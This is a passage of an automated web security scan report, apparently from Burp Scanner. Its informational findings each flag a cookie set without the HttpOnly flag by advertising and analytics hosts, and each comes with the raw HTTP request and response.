Cookie: C2=H88lNJpwIg02FAHCdbdBwhAZhXAcIgZ4FAHCAGeBwhwrhXAcI0NYGAHCYimBwhgQvaAcIQTnGAHCmMqBwhQRgaAc; GUID=MTMwMTc5NDU2NzsxOjE2cGZidXQxZDQ1aXVuOjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 09 Apr 2011 12:29:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: C2=EFFoNJpwIg02FAHCdbdBwhAZhXAcIgZ4FAHCAGeBwhwrhXAcI0NYGAHCYimBwhgQvaAcIQTnGAHCmMqBwhQRgaAc; domain=advertising.com; expires=Mon, 08-Apr-2013 12:29:56 GMT; path=/
Set-Cookie: GUID=MTMwMjM1MjE5NjsxOjE2cGZidXQxZDQ1aXVuOjM2NQ; domain=advertising.com; expires=Mon, 08-Apr-2013 12:29:56 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 05:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Sat, 09 Apr 2011 13:29:56 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;
6.106. http://lfov.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lfov.net
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: lfov.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coyote-2-405e0b67=405e0b12:0

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
ETag: W/"1406-1239369371000"
Last-Modified: Fri, 10 Apr 2009 13:16:11 GMT
Content-Length: 1406
Date: Sat, 09 Apr 2011 00:24:25 GMT
Set-Cookie: Coyote-2-405e0b67=405e0b12:0; path=/

..............h.......(....... ....................................I..=l!.}H).~1{..us...u...o...q.............##...U...Z..CC.........A...K...m...v.....................................................
...[SNIP]...
6.107. http://lfov.net/webrecorder/g/chimera.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lfov.net
Path:   /webrecorder/g/chimera.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webrecorder/g/chimera.js?vid=null HTTP/1.1
Host: lfov.net
Proxy-Connection: keep-alive
Referer: http://www.ingeniux.com/solutions/website_optimization
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coyote-2-405e0b67=405e0b12:0

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Set-Cookie: LOOPFUSE=8b608c87-3854-404c-94cf-624bd3d0d3fb; Expires=Sun, 08-Apr-2012 00:18:14 GMT
Content-Length: 51
Date: Sat, 09 Apr 2011 00:18:14 GMT
Set-Cookie: Coyote-2-405e0b67=405e0b12:0; path=/


_lf_vid='8b608c87-3854-404c-94cf-624bd3d0d3fb';

6.108. http://lfov.net/webrecorder/js/listen.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lfov.net
Path:   /webrecorder/js/listen.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webrecorder/js/listen.js HTTP/1.1
Host: lfov.net
Proxy-Connection: keep-alive
Referer: http://www.ingeniux.com/solutions/website_optimization
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Last-Modified: Sun, 03 Apr 2011 02:29:18 GMT
Cache-Control: max-age=604800, public
Pragma: public
Expires: Fri, 15 Apr 2011 20:18:12 GMT
Date: Sat, 09 Apr 2011 00:18:12 GMT
Set-Cookie: Coyote-2-405e0b67=405e0b12:0; path=/
Content-Length: 5132

var _lf_cid="";var i="";var _lf_mydomain="";var _lf_doc=document;var _lf_doc_title=_lf_doc.title;var _lf_currpage=window.location.href;var _lf_loopfusePageProtocol=window.location.protocol+"//";var _l
...[SNIP]...
6.109. http://lfov.net/webrecorder/w  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lfov.net
Path:   /webrecorder/w

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webrecorder/w?cid=LF_d4cfab7e&vid=ebd94f8a-082f-4397-b307-6476c23d9589&from=&t=Google%20Website%20Optimizer%20Solution&res=1920x1200&cp=http%3A//www.ingeniux.com/solutions/website_optimization&0.6658891823608428 HTTP/1.1
Host: lfov.net
Proxy-Connection: keep-alive
Referer: http://www.ingeniux.com/solutions/website_optimization
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coyote-2-405e0b67=405e0b12:0

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Content-Length: 0
Date: Sat, 09 Apr 2011 00:18:17 GMT
Set-Cookie: Coyote-2-405e0b67=405e0b12:0; path=/

6.110. http://load.exelator.com/load/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://load.exelator.com
Path:   /load/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /load/?p=104&g=080&j=0&u=1234567&site=2222 HTTP/1.1
Host: load.exelator.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xltl=eJxli8sKwjAQRf9lvqAziZNkuiqmPrFUi9hdaZoIIt0orsR%252Ft3Xr5nA53NOLkvdzApy3HvJpkQAPVxOZXFTGYUqs%252ByGQwZiFgBQVzj9Egdctdg1luvDtrMgILIuyKVfr%252BmTH7L7bjLF6pIM%252F7i%252Bt%252Favq6qecgGVW2rFhIqeVMsQLyD9fAxIpjg%253D%253D; EVX=eJylzUEKgDAMRNG7eIJMao1JDxO67Nql9O622I0gWHA5vA%252BTLdpZTFmYKWVDX5QOw24LYgwuDhEngm%252B%252BL6mOGJPxqhpoNlbV2NLwlRbDU5nWoejKL4qh983WbvjfTa0XIFpQZw%253D%253D; BFF=eJzFVMtOwzAQ%252FBd%252FgZ%252B17FxaxIFIrYloVMEJ9ciZI%252FTf6yQl3bqziXioXHd2ZrybzO6jUfHjPSoZxequXQbttZaieovKOVNlwESxeUztw%252FrldVdv61ZU%252B2jdJMf0dSpCO1UBPG2eoUSuc51IQoVgvAaAzYAsGasm4Xc3ieu8krjH78512umi2Gppc%252FVTqmUIYVHonFEK6BEoOX5EOBvdURxno3mbkjOOqJBVk6Ym6lFk1e0TT3S5%252B5NNnXYnGzTRgAKbDJQcPyK03xMhDf5%252FanSxOkuMrlhAVU2R2QXz37JH%252BQU78JyeY%252FghBxy8E8YFqaIhYYJCFK3ypnvp1xCLXLZDmVRI47l8%252BMlNucUJ%252Bf7FmDkQ%252FB2YifzfJ5sP8ExW%252BUjOpu%252B%252FQvaLLN0yMh4HxFeHI9JB3gY%253D; TFF=eJydkj0OwjAMhe%252FSE9hOmkfSpcdg7dABiQ021LvjIgj9C7gdLEfJ%252B5K8J3dJJD1uiSVVDLRE3MYYpWq6pAeXxI1WXTtt9FkOqvcTvUCERsItCNE6%252FSP5CMkxOsgR0itJ9jfnudQHuWDlkDEboR2w392f%252B2t375d3402wbNgQ8vaxmOuLcfFvrhjXkkPGbITukS8oi955p3fe5x0Z25MWw6lt2fwZvvqwoV%252B9g3UCIQ%252FjC7MR4zA6k3J4At0qIAM%253D

Response

HTTP/1.1 302 Found
Connection: close
X-Powered-By: PHP/5.2.8
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Content-Type: image/gif
Set-Cookie: BFF=eJzFVMtuwjAQ%252FBd%252FgZ9x7Vyg6qGRihsVC5UT4si5x8K%252F105CWMxuoj5ErzM7O7tOZvdeKf%252F54QX3bPkYF05aKTmrD14Yo%252BpEKM9WryE%252Bv2x3m2bdRFbvvX6Y1KgOh01gpSiIt9U72iLhVCXWQjinrEQInQheKpZtwOduA1V50%252BIJnzvhsNJ4tpZcJ%252FTIxcI5VxV9Liwk5EiUGjsylI3MEkPZSNqm1IwrCsyqDVMbdSxmld8T3%252Bj67QebJmwGG2yjnkVsElFq7MjAegsaSeT%252Fh0ZXT6eB0Y0K6SqmxOQD09%252ByY%252BkHNsg4nUbRS%252FY8MicaF6wrtiSaIOdZFFblSc9LVAnWPQwQUAjhPHIUXEfQoeKJMAMOoPwyQy0YI1Gnn5yme1yi7x%252BemTtDn5OZy%252FH3B4K%252BAzORp5M9G%252BL%252FyuovInnP5Fk8Z3YqZ3SovgCHfvpx; expires=Sun, 07-Aug-2011 12:31:05 GMT; path=/; domain=.exelator.com
Set-Cookie: TFF=eJydkjEOgzAMRe%252FCCWwnxCQsHKMrA0Olbu2GuHsNKqEkpDUMkSP0n%252BNvfh%252FIhfEZkEKFzB0Adt57qto%252BUBjvAVs5dW2kwHqdRG%252B%252F9MREMBMmIUhO84%252FEKyR6b5iukFZI0L%252B530t9kXNajiOmI6Qy63sPt%252BHRv4akt4MPgdlvFhsEVh%252BLvb64LvzNFdeVchwxHSHfwBaUVJoJT3rHc945Yme2hWzENh1OxpveHeizdzjfgIthXDAdMYfRKHsvM822GzjysEQS1muuTz1sEU44jpiOkJompKCc3s%252B%252FUUQ%253D; expires=Sun, 07-Aug-2011 12:31:05 GMT; path=/; domain=.exelator.com
Location: http://segments.adap.tv/data/?p=exelate&uid=1234567&sid=2222&ag=!!AGE!!&seg=927221
Content-Length: 0
Date: Sat, 09 Apr 2011 12:31:05 GMT
Server: HTTP server

6.111. http://loadm.exelator.com/load/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://loadm.exelator.com
Path:   /load/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /load/?p=204&g=051&j=0&bi=a53875b5-a877-4a03-ad1a-e28c70299475 HTTP/1.1
Host: loadm.exelator.com
Proxy-Connection: keep-alive
Referer: http://cdn.interclick.com/gtpdp.aspx?i=50
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xltl=eJxli8sKwjAQRf9lvqAziZNkuiqmPrFUi9hdaZoIIt0orsR%252Ft3Xr5nA53NOLkvdzApy3HvJpkQAPVxOZXFTGYUqs%252ByGQwZiFgBQVzj9Egdctdg1luvDtrMgILIuyKVfr%252BmTH7L7bjLF6pIM%252F7i%252Bt%252Favq6qecgGVW2rFhIqeVMsQLyD9fAxIpjg%253D%253D; EVX=eJylzUEKgDAMRNG7eIJMao1JDxO67Nql9O622I0gWHA5vA%252BTLdpZTFmYKWVDX5QOw24LYgwuDhEngm%252B%252BL6mOGJPxqhpoNlbV2NLwlRbDU5nWoejKL4qh983WbvjfTa0XIFpQZw%253D%253D; BFF=eJzFVMtOwzAQ%252FBd%252FgR9xLDuXFnEgEjURtSo4oR45cwT%252BHTsx7sbdTURB5TqzO7PrZOfolHbvb05wx7Y3YWOlkZKz7tUJrVUXCeXY7sGHu%252Fvnl0O%252F7wPrjk6LxR414lAEVoqKeNw9oRIRpyoxCWGtMhIhmkjwumM7eHzuwVOVZxK3%252BNwRh5Xasb3kTUQ%252FuNhYa9tK58RCQhai7jGFoWxkatGUjaRt6p6yosCsBr%252B00chiVuk98Y3mb59ten%252FINthGE4vYRKLuMYWB9QYISeT%252Fh0azp2uA0VkXoiqWmskHpr%252FlyNIPrJFxxh5FLznxyJzouWCq2JLoBVnHgjAqTfq9RBvhZoIBAgohnEYOgjcBKLQ8EjrjAEovk2vBGBOVZTyUkScZD6BZrSrE5yX5do04%252B3l6rYQVnUkr8fP3KUOHyUpu0PGwmgT%252FdfC%252FuOtrnq%252FBj9UsHesll0md4ReE4BYY; TFF=eJydkz1uwzAMhe%252BSE5BPshgpS46R1YOHAt2aLcjdQ7uNauunpT0IFIz3UXwP9JgQ0%252BMrMdKJRa5EfI0x4nQZE9LjI%252FFFzzA4LfS%252BPlXvV3oIQDPhCgJ6zv%252BRfITkGJ3gCOmVJPub21yGg1ywcpIxG6FVxN57uk2f430qegf8EOwbNkDevhZbfTcu%252FpvrxlVykjEbod%252FId5TozcQ7vfM%252B75KxPWmxOLWN5mTyqw8NffWO1AmEvIwLZiPmZXTG3stMs%252B0ztTwEynq91vrSw6LfZvXNScZshNZyQ%252FLvgc5M4LaHlR4NfeUB9URYeVDMRjxfEXx3iQ%253D%253D

Response

HTTP/1.1 302 Found
Connection: close
X-Powered-By: PHP/5.2.8
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Content-Type: image/gif
Set-Cookie: xltl=eJxljsEKwjAQBf8l90KySXaT9SRt1SqWahF7k7SpINKL4kn8d9se9fYYZuAFNvx%252BsmZxKjKxGBewwO5KEcFHTV71PZrQtUAqyrZVELWaPKVYvG7xUoM0y6yZEBCLdJnX%252BWpdHd0g79vNEMtHv88Ou3Pj%252FqqqnJFn4RC18UgI4I3WBGh%252F7aJM53vIIljtyLY2CY4oMUHqJEQVkh5cRxK8NzTmny8%252Ftjl1; expires=Tue, 09-Aug-2011 17:31:23 GMT; path=/; domain=.exelator.com
Set-Cookie: BFF=eJy9VMtOwzAQ%252FJd8gR9xLDuXlnAgEjURtSo4oR45c4T%252BO04cnI27m4iAep3Zmd11NnO2UtvPD8uZLfZ3fmeEFoIV9bvlSsk6ENIWhyfnHx5f307tsfVFfbZKLWrkgEMTWMkz4vnwgloEnKrELLgxUguEKAPBcsW%252Bc%252FjcnaMqryzu8bkDDiuVLY6ClQH9YnxnjKkyn4mFhEhErtGJodqIXqKoNoJuk2vSihxr1bmljQYWa9W%252FJ77R%252FO3HNq07jW2wjSKLtAlErtGJgfUaGAnk%252FmGj2dOVoNGVCnHlS2LygelvObD0AytknEEj6SUjj8yJ%252Fi6YK7Yk%252BgcZW3iuZT%252FpzxJVgMsIAwQUQrgf2XNWeuBQsUCoEQdQ%252FzJjLRgjUqONgzZisnEAmtVKSKRTbeanmmQTC4l0qk2uSefTJPCyJUZvkZq%252FD8mVTKSjbyXl%252Fj%252FM6MxaiSc6hRYCJ14FkSuRpHMFF3PkTIlc%252BUN83DIlNJ4JeikTtgTA1r%252Bd%252Bqkv3wcsPF0%253D; expires=Tue, 09-Aug-2011 17:31:23 GMT; path=/; domain=.exelator.com
Set-Cookie: TFF=eJydkjEOwjAMRe%252FCCeyfpiZh4RisHTogscGGuDsulNCmCbgdokTtf7a%252F9bvoEO%252FXyIg7FjkS8TGEgN2hi%252FrjHPmgx3unF32eD9U3Ez0EoIFwGQE9%252B38kbyE5BCfYQjZKkr3nfC9%252BI9daOUmYjdBbxF67P%252FWX7tZntVuMBPuCDVBjj8VcX10X%252F%252Baq68o5SZiN0G%252FUVMxXvfBK77zOuyRszbZYnNpGcTL56tuCftFHxj7IOEmYjRjC6Iy1XzMNtvdU8tBS0utzqc89vPTzXb05SZiN0LuaEFRmApc9TPQo6BcesJwIEw%252BKWYmURV%252FMbnGyiT7P7q%252FJRsxGPJ4iJp3R; expires=Tue, 09-Aug-2011 17:31:23 GMT; path=/; domain=.exelator.com
Set-Cookie: EVX=deleted; expires=Sun, 11-Apr-2010 17:31:22 GMT; path=/; domain=load.exelator.com
Set-Cookie: EVX=deleted; expires=Sun, 11-Apr-2010 17:31:22 GMT; path=/; domain=loadus.exelator.com
Set-Cookie: EVX=eJylzksKgDAMhOG7eIJM2rQmPUxw2bVL6d21%252BABBUHA5fP9iJhNbqilnZiqToS8qs2G0ASLBsyNnJ4InH4fSjhgf46ga6GusqrKl8S2thrsyxUPRlR8Ul4ZLE58qcHTdT6TtBP870doK4EBXtg%253D%253D; expires=Tue, 09-Aug-2011 17:31:23 GMT; path=/; domain=.exelator.com
Location: http://load.s3.amazonaws.com/pixel.gif
Content-Length: 0
Date: Mon, 11 Apr 2011 17:31:24 GMT
Server: HTTP server

6.112. http://metrics.foxnews.com/b/ss/foxnews/1/H.20.3/s57025025668554  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.foxnews.com
Path:   /b/ss/foxnews/1/H.20.3/s57025025668554

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/foxnews/1/H.20.3/s57025025668554?AQB=1&ndh=1&t=11/3/2011%2011%3A21%3A5%201%20300&ce=utf-8&ns=foxnews&pageName=fnc%3Aroot%3Aroot%3Achannel&g=http%3A//www.foxnews.com/&cc=USD&ch=root&events=event1&c1=root&v1=D%3Dc1&h1=fnc%2Croot&c2=root&v2=D%3Dc2&c3=root&v3=D%3Dc3&c4=root&v4=D%3Dc4&v10=D%3DpageName&c22=New&v22=New&c23=D%3DpageName&c26=1&c27=First%20Visit&c40=root%3AFoxNews.com%20-%20Breaking%20News%20%7C%20Latest%20News%20%7C%20Current%20News&c41=12%3A00PM&v41=12%3A00PM&c42=Monday&v42=Monday&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1079&bh=1038&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.foxnews.com
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs=D08734_70852; __qca=P0-166217050-1302538865283; __qseg=Q_D|Q_T|Q_2120|Q_2156|Q_2149|Q_2129|Q_2118|Q_2151|Q_2150|Q_919|Q_924|Q_929|Q_928|Q_922|Q_921; weatherloc=%7B%22location%22%3A%5B%7B%22loc_id%22%3A%22USNY0996%22%2C%22zip%22%3A%2210108%22%2C%22city%22%3A%22New%20York%22%2C%22state%22%3A%22NY%22%7D%5D%7D; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B; s_pers=%20s_vnum%3D1305130865325%2526vn%253D1%7C1305130865325%3B%20s_invisit%3Dtrue%7C1302540665325%3B%20omtr_lv%3D1302538865329%7C1397146865329%3B%20omtr_lv_s%3DFirst%2520Visit%7C1302540665329%3B%20s_nr%3D1302538865334%7C1305130865334%3B

Response

HTTP/1.1 302 Found
Date: Mon, 11 Apr 2011 16:21:09 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26D1953A850108DA-400001046000A375[CE]; Expires=Sat, 9 Apr 2016 16:21:09 GMT; Domain=.foxnews.com; Path=/
Location: http://metrics.foxnews.com/b/ss/foxnews/1/H.20.3/s57025025668554?AQB=1&pccr=true&vidn=26D1953A850108DA-400001046000A375&&ndh=1&t=11/3/2011%2011%3A21%3A5%201%20300&ce=utf-8&ns=foxnews&pageName=fnc%3Aroot%3Aroot%3Achannel&g=http%3A//www.foxnews.com/&cc=USD&ch=root&events=event1&c1=root&v1=D%3Dc1&h1=fnc%2Croot&c2=root&v2=D%3Dc2&c3=root&v3=D%3Dc3&c4=root&v4=D%3Dc4&v10=D%3DpageName&c22=New&v22=New&c23=D%3DpageName&c26=1&c27=First%20Visit&c40=root%3AFoxNews.com%20-%20Breaking%20News%20%7C%20Latest%20News%20%7C%20Current%20News&c41=12%3A00PM&v41=12%3A00PM&c42=Monday&v42=Monday&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1079&bh=1038&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Sun, 10 Apr 2011 16:21:09 GMT
Last-Modified: Tue, 12 Apr 2011 16:21:09 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www35
Content-Length: 0
Content-Type: text/plain

6.113. http://odb.outbrain.com/utils/get  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://odb.outbrain.com
Path:   /utils/get

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /utils/get?url=http%3A%2F%2Fwww.wptz.com%2Fnews%2F27483035%2Fdetail.html&settings=true&recs=true&widgetJSId=SB_2&key=AYQHSUWJ8576&idx=0&version=36720&ref=http%3A%2F%2Fwww.wptz.com%2Fnews%2Findex.html&apv=false&rand=0.9197700712829828&sig=il HTTP/1.1
Host: odb.outbrain.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: obuid=251d3be2-4514-4ca7-9d4f-e0873871b5bc

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: obuid=251d3be2-4514-4ca7-9d4f-e0873871b5bc; Domain=.outbrain.com; Expires=Tue, 03-Apr-2012 12:30:48 GMT; Path=/
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: tick=1302352248759; Domain=.outbrain.com; Path=/
P3P: policyref="http://www.outbrain.com/w3c/p3p.xml",CP="NOI NID CURa DEVa TAIa PSAa PSDa OUR IND UNI"
Set-Cookie: _lvs2="3kfMmu42uMQ="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Sat, 05-May-2012 12:30:48 GMT; Path=/
Set-Cookie: _lvd2="eG6mUIYxlPl5WOXcO9UcZQ=="; Version=1; Domain=outbrain.com; Max-Age=564480; Expires=Sat, 16-Apr-2011 01:18:48 GMT; Path=/
Set-Cookie: _rcc2="c5YqA63GvjSl+Ov6ordflA=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Sat, 05-May-2012 12:30:48 GMT; Path=/
Set-Cookie: recs-4605f628f91de21e4b5f9433f46e29eb="TzfEOIRkmbMHOLUEevQ6iACEaThf5EywnAOvJKUY95/n+ZcMKGx626RG93OMfYuvVETVSTcWr24ZLLSqhAR7AnlY5dw71Rxl"; Version=1; Domain=outbrain.com; Max-Age=300; Expires=Sat, 09-Apr-2011 12:35:48 GMT; Path=/
Content-Type: text/x-json;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 09 Apr 2011 12:30:48 GMT
Content-Length: 6191

outbrain_rater.returnedOdbData({'response':{'exec_time':17,'status':{'id':0,'content':'Request succeeded'},'request':{'did':'198886491','req_id':'2d6842eb89c7ef422fcc212014a03c6d'},'score':{'preferred
...[SNIP]...
6.114. http://odb.outbrain.com/utils/ping.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://odb.outbrain.com
Path:   /utils/ping.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /utils/ping.html?random=0.7953731208108366 HTTP/1.1
Host: odb.outbrain.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: obuid=dd7423b0-80a9-45ce-83f1-e3452ea306b5; Domain=.outbrain.com; Expires=Tue, 03-Apr-2012 12:30:48 GMT; Path=/
P3P: policyref="http://www.outbrain.com/w3c/p3p.xml",CP="NOI NID CURa DEVa TAIa PSAa PSDa OUR IND UNI"
Cache-Control: no-cache
Pragma: no-cache
Accept-Ranges: bytes
ETag: W/"158-1301899424000"
Last-Modified: Mon, 04 Apr 2011 06:43:44 GMT
Content-Type: text/html
Content-Length: 158
Date: Sat, 09 Apr 2011 12:30:48 GMT

<html>
   <head>
       <META HTTP-EQUIV="Cache-Control" CONTENT="no-cache">
       <META HTTP-EQUIV="Pragma" CONTENT="no-cache">
   </head>
   <body>
   </body>
</html>
6.115. http://pix04.revsci.net/D08734/a1/0/0/0.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /D08734/a1/0/0/0.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /D08734/a1/0/0/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Fgoogle.com%252F0.gif%253Fid%253DCAESEHY1ZuArE-t4uQIwODrZlUM&cver=1 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
